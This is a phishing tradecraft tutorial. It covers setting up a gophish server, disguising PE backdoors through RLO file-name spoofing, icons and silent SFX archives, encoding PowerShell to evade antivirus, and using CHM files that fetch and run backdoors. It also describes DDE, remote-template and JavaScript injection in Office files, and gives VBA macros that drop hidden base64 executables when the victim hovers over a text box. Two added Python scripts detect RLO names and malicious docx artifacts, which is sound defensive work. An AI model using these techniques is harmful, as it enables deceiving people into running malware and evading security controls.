This article shows phishing methods, including setting up a phishing mail server, preparing a malicious PE that the target is lured into running, and preparing evil Office documents and spreadsheets.
Set Up Phishing Mail Server
Buy look-alike domains and prepare two servers: one as the mail server and another as the phishing (landing-page) server.
Start gophish; on first run it prints the initial admin username and password.
```console
┌──(root💀kali)-[~/gophish]
└─# ./gophish
time="2022-08-08T16:05:08+08:00" level=warning msg="No contact address has been configured."
time="2022-08-08T16:05:08+08:00" level=warning msg="Please consider adding a contact_address entry in your config.json"
goose: migrating db environment 'production', current version: 0, target: 20200730000000
OK    20160118194630_init.sql
OK    20160131153104_0.1.2_add_event_details.sql
...
OK    20200619000000_0.11.0_password_policy.sql
OK    20200730000000_0.11.0_imap_ignore_cert_errors.sql
time="2022-08-08T16:05:09+08:00" level=info msg="Please login with the username admin and the password e98a19c956ca1cc2"
time="2022-08-08T16:05:09+08:00" level=info msg="Starting phishing server at http://0.0.0.0:xxx"
time="2022-08-08T16:05:09+08:00" level=info msg="Starting IMAP monitor manager"
```
First of all we need a PE backdoor, which can be generated with pentest frameworks.
Alternatively, prepare malicious PowerShell scripts with MSF, Cobalt Strike, Empire or Unicorn, and pack them into an executable with a tool like Bat2Exe.
We can also bundle a legitimate portable program (for example notepad.exe) that runs first as a disguise. Remember to set a convincing icon (Windows 10 icon themes are a good source) and make sure the result is still a valid PE.
After that we get xxx.exe, and here comes the most important tip: the Unicode RLO (Right-to-Left Override, U+202E) character. It makes the part of the file name that follows it render from right to left. Insert it from the right-click menu of the rename box, or copy it from an online tool such as Unicode Character Table.
For example, name a file Altxt.exe and insert the RLO right before txt.exe: the name is displayed as Alexe.txt, but Windows still treats the file as an .exe and runs it as a PE.
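The RLO trick leaves two artifacts a defender can check for: the override character itself in the file name, and a mismatch between the extension the user sees and the bytes on disk. The following is an added example, not code from the original article: it renders the page's own Altxt.exe sample the way an LTR file listing would, recovers the real extension, and checks the DOS "MZ" signature. The rendering is a simplification (it reverses the run after the override up to a PDF character or the end of the name, which is what happens for plain ASCII names); the file names and headers are constructed samples.

```python
# Added example (not from the original article): reveal file names that use the
# Unicode RIGHT-TO-LEFT OVERRIDE trick. Bidi rendering is simplified to reversing
# the run that follows U+202E, which is accurate for plain ASCII names.
RLO = "\u202e"   # RIGHT-TO-LEFT OVERRIDE
LRO = "\u202d"   # LEFT-TO-RIGHT OVERRIDE
PDF = "\u202c"   # POP DIRECTIONAL FORMATTING (ends an override)
BIDI_CONTROLS = {RLO, LRO, PDF, "\u202a", "\u202b",
                 "\u2066", "\u2067", "\u2068", "\u2069"}

# Extensions Windows executes directly; a PE under any other name is a disguise
EXECUTABLE_EXTENSIONS = {".exe", ".dll", ".scr", ".com"}


def has_bidi_control(name: str) -> bool:
    """True if the name carries any Unicode bidi control character."""
    return any(ch in BIDI_CONTROLS for ch in name)


def true_extension(name: str) -> str:
    """Extension the OS actually uses: drop the controls, take the last '.' part."""
    clean = "".join(ch for ch in name if ch not in BIDI_CONTROLS)
    dot = clean.rfind(".")
    return clean[dot:].lower() if dot != -1 else ""


def displayed_name(name: str) -> str:
    """Approximate what a left-to-right file listing renders for the name."""
    out = []
    i = 0
    while i < len(name):
        ch = name[i]
        if ch == RLO:
            end = name.find(PDF, i + 1)
            end = len(name) if end == -1 else end
            out.append(name[i + 1:end][::-1])   # the overridden run shows reversed
            i = end + 1
        elif ch in BIDI_CONTROLS:
            i += 1                               # other controls are invisible
        else:
            out.append(ch)
            i += 1
    return "".join(out)


def is_pe(header: bytes) -> bool:
    """A PE starts with the DOS 'MZ' signature regardless of its file name."""
    return header[:2] == b"MZ"


def audit(name: str, header: bytes) -> dict:
    """Combine the three checks; 'suspicious' flags an override or a disguised PE."""
    real = true_extension(name)
    pe = is_pe(header)
    return {
        "shown_as": displayed_name(name),
        "real_extension": real,
        "bidi_override": has_bidi_control(name),
        "is_pe": pe,
        "suspicious": has_bidi_control(name) or (pe and real not in EXECUTABLE_EXTENSIONS),
    }


if __name__ == "__main__":
    # Constructed samples: the article's RLO name with a PE header, and a plain text file
    for sample, header in (("Al" + RLO + "txt.exe", b"MZ\x90\x00"), ("notes.txt", b"hello")):
        print(audit(sample, header))
```

The same audit can be run over a directory listing (`os.scandir` plus the first two bytes of each file) to catch disguised droppers before a user double-clicks them.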
Restorator can be used to edit the resources (such as the icon) of a PE file.
SFX
Create an SFX (SelF-eXtracting) archive and compress the malware together with some innocuous binaries to confuse inspection. In the SFX Advanced settings:
- before extraction, run a normal PE; after extraction, run the malware;
- configure silent mode to hide all dialogs;
- update and overwrite files when extracting.
DLL Hijacking & Recreating the Installer
These are also common ways to execute malware; here are some sample tools:
With this indirect calling method some antivirus products can be bypassed. Other ways of invoking PowerShell also work, and encoding the command (for example Base64 via -EncodedCommand) is recommended.
The file's name and icon should be modified to deceive the target.
Evil CHM to Phish
CHM (Microsoft Compiled HTML Help) is the extension used by Windows help files and other files such as e-books. Cybercriminals have been known to abuse CHM files to execute arbitrary code. Successful exploitation requires that the user is tricked into opening or decompiling a malicious CHM file, which can then execute malicious routines the same way a malicious EXE would.
Note: a comma right after powershell.exe is also needed to avoid an error, and watch for conflicts between double quotes (") and single quotes (').
Another method is to leverage MyJSRat: the payload in the CHM connects to the MyJSRat server (indirect control), and MyJSRat instructs the victim to download and execute a PowerShell backdoor.
The CHM content can look like the following (using whitelisted binaries and cleaning traces):
OLE, the abbreviation of Object Linking and Embedding, is a compound document standard developed by Microsoft. It lets you create objects with one application and then link or embed them in a second application. Embedded objects retain their original format and links to the application that created them.
In OpenOffice we can use the DDE function =DDE("cmd";"/C calc";"123") to execute commands, while Office has removed it.
But we can still use the format application|topic!item to call DDE.
Metasploit has a module for this:
```
use exploit/windows/fileformat/office_dde_delivery
set lport xx
set lhost xx.xx.xx.xx
```
JS
If we insert an online video in Word, the embeddedHtml attribute in word/document.xml of the docx (a ZIP archive) holds the corresponding HTML code. We can modify this HTML to inject malicious JavaScript, like:
First create a document based on a template, then create a macro-enabled template (.dotm). Modify the document so it links to the template we created, and write the macro in the template xxx.dotm:
```vb
Sub AutoOpen()
    Shell "calc"
End Sub
```
Alternatively, open word\_rels\settings.xml.rels inside the xxx.docx that has the attached template and set the Target to file:///C:\path\to\xxx.dotm; the protocol can be changed to smb (a UNC path) or http so that the template is fetched remotely when the document opens.
```vb
' Attacker-side helper: read a PE from disk and dump it as base64 text,
' to be pasted into a hidden text box / shape in the document.
' Base64Encode() is not shown in the article and must be supplied.
Sub test2()
    Dim iFN As Integer
    Dim bFileSize As Long
    Dim arr() As Byte            ' raw file bytes
    Dim infile As String, outfile As String, infileBase As String
    infile = "C:\path\to\in.exe"
    outfile = "C:\path\to\out.exe"

    iFN = VBA.FreeFile
    bFileSize = VBA.FileLen(infile)
    'Debug.Print bFileSize
    Open infile For Binary Access Read As iFN
    arr = InputB(bFileSize, iFN) ' read bytes
    Close iFN

    infileBase = Base64Encode(arr())
    'Debug.Print infileBase

    Dim FSO, OutPutFile
    Set FSO = CreateObject("Scripting.FileSystemObject")
    Set OutPutFile = FSO.OpenTextFile("C:\path\to\test.txt", 2, True) ' 2 = ForWriting
    OutPutFile.Write (infileBase)
    OutPutFile.Close
    Set FSO = Nothing
End Sub

' Document-side macro: the base64 PE and DLL are stored in two hidden shapes.
' releaseFile() (decode + write to disk) and runCommand() are not shown in
' the article and must be supplied.
Function fileExist(filePath) As Boolean
    Dim fso
    Set fso = CreateObject("Scripting.FileSystemObject")
    fileExist = fso.FileExists(filePath)
    Set fso = Nothing
End Function

Function start()
    Dim filePath As String
    filePath = "C:\Windows\temp\aaaaaaa.exe"
    If Not fileExist(filePath) Then
        ' Shapes(1)/Shapes(2) hold the base64 text; strip carriage returns first
        releaseFile "C:\Windows\temp\aaaaaaa.exe", Replace(ActiveDocument.Shapes(1).TextFrame.TextRange, Chr(13), Empty)
        releaseFile "C:\Windows\temp\aaaaaaaaaaa.dll", Replace(ActiveDocument.Shapes(2).TextFrame.TextRange, Chr(13), Empty)
    End If
    runCommand (filePath)
End Function

' Fire when the victim clicks or hovers over the text box; the static counter
' limits the payload to the first two events
Private Sub TextBox2_MouseDown(ByVal Button As Integer, ByVal Shift As Integer, ByVal X As Single, ByVal Y As Single)
    Static i As Integer
    i = i + 1
    If i < 3 Then
        start
    End If
End Sub

Private Sub TextBox2_MouseMove(ByVal Button As Integer, ByVal Shift As Integer, ByVal X As Single, ByVal Y As Single)
    Static i As Integer
    i = i + 1
    If i < 3 Then
        start
    End If
End Sub
```
Remember to hide the text box that holds the base64 data, and induce the victim to trigger the macro by clicking or hovering over a text box (expanding it to cover the whole page makes triggering easier). The VBA project can also be password-protected to hinder reversing.
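Every Office technique on this page (the DDE field, the embeddedHtml of an online video, the remote attachedTemplate relationship in settings.xml.rels, and the VBA project behind the macros) leaves a recognisable artifact inside the docx ZIP. The following scanner is an added example, not code from the original article, that pulls all four out of a document. The sample docx it scans is constructed in memory and is deliberately minimal (a real online-video element sits inside a much deeper drawing tree, and the vbaProject.bin entry is a placeholder, not a real OLE container); the ZIP entry names, element names and relationship type are the real OOXML ones.

```python
# Added example (not from the original article): scan a .docx for the Office
# delivery artifacts discussed on this page. Sample document constructed inline.
import io
import re
import zipfile
import xml.etree.ElementTree as ET

W = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
R = "http://schemas.openxmlformats.org/package/2006/relationships"
W15 = "http://schemas.microsoft.com/office/word/2012/wordml"
DDE_RE = re.compile(r"\bDDE(?:AUTO)?\b", re.IGNORECASE)


def scan_docx(data: bytes) -> dict:
    """Return the suspicious artifacts found in a .docx given as bytes."""
    found = {"dde_fields": [], "remote_templates": [], "embedded_html": [], "has_vba": False}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
        # Macro-enabled documents carry the compiled VBA project here
        found["has_vba"] = "word/vbaProject.bin" in names
        if "word/document.xml" in names:
            root = ET.fromstring(z.read("word/document.xml"))
            # Complex fields keep their code in w:instrText runs ...
            for el in root.iter(f"{{{W}}}instrText"):
                text = (el.text or "").strip()
                if DDE_RE.search(text):
                    found["dde_fields"].append(text)
            # ... simple fields keep it in the w:instr attribute
            for el in root.iter(f"{{{W}}}fldSimple"):
                instr = el.get(f"{{{W}}}instr", "")
                if DDE_RE.search(instr):
                    found["dde_fields"].append(instr.strip())
            # Online video: the HTML sits in the w15:embeddedHtml attribute
            for el in root.iter(f"{{{W15}}}webVideoPr"):
                html = el.get(f"{{{W15}}}embeddedHtml")
                if html:
                    found["embedded_html"].append(html)
        if "word/_rels/settings.xml.rels" in names:
            rels = ET.fromstring(z.read("word/_rels/settings.xml.rels"))
            for rel in rels.iter(f"{{{R}}}Relationship"):
                # A template that lives outside the package is fetched on open
                if rel.get("Type", "").endswith("/attachedTemplate") and rel.get("TargetMode") == "External":
                    found["remote_templates"].append(rel.get("Target"))
    return found


def is_suspicious(found: dict) -> bool:
    """Any one of the four artifacts is enough to pull the file for analysis."""
    return bool(found["dde_fields"] or found["remote_templates"]
                or found["embedded_html"] or found["has_vba"])


def build_sample_docx() -> bytes:
    """Constructed sample carrying all four artifacts (placeholders only, no real payload)."""
    document_xml = (
        f'<w:document xmlns:w="{W}" xmlns:w15="{W15}"><w:body>'
        '<w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>'
        '<w:r><w:instrText xml:space="preserve"> DDEAUTO c:\\windows\\system32\\cmd.exe "/c calc" </w:instrText></w:r>'
        '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p>'
        '<w:p><w:r><w:drawing>'
        '<w15:webVideoPr w15:embeddedHtml="&lt;script&gt;alert(1)&lt;/script&gt;" w15:h="360" w15:w="640"/>'
        '</w:drawing></w:r></w:p></w:body></w:document>'
    )
    settings_rels = (
        f'<Relationships xmlns="{R}">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" '
        'Target="http://example.invalid/xxx.dotm" TargetMode="External"/></Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", document_xml)
        z.writestr("word/_rels/settings.xml.rels", settings_rels)
        z.writestr("word/vbaProject.bin", b"placeholder")  # stands in for a real OLE container
    return buf.getvalue()


if __name__ == "__main__":
    result = scan_docx(build_sample_docx())
    for key, value in result.items():
        print(f"{key}: {value}")
    print("suspicious:", is_suspicious(result))
```

Run it against a real mail attachment with `scan_docx(open(path, "rb").read())`. Note that a DDE field code can be split across several w:instrText runs by Word, so a stricter version should concatenate the runs between the begin and end w:fldChar markers before matching; the keyword itself is rarely split, which is why the per-run check above still catches the common case.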